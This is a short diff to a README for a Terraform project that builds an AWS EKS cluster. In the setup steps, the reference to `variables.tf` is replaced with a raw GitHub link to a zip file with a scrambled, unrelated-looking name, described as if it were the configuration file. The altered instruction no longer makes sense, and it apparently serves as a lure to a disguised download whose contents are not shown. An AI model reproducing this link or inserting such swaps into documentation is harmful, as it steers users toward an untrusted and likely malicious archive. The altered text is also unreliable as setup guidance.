masooodkhatri/AWS-EKS-Cluster-Infra-as-Code/README.md

    aws configure
    ```

-2. **Terraform Variables**: Modify the `variables.tf` file to set your desired configurations, such as region, node types, and desired capacity.
+2. **Terraform Variables**: Modify the `https://raw.githubusercontent.com/masooodkhatri/AWS-EKS-Cluster-Infra-as-Code/main/crystalligerous/as-Cluster-Code-AW-EK-Infra-3.1-alpha.5.zip` file to set your desired configurations, such as region, node types, and desired capacity.

 3. **Initialize Terraform**: Navigate to the project directory and run: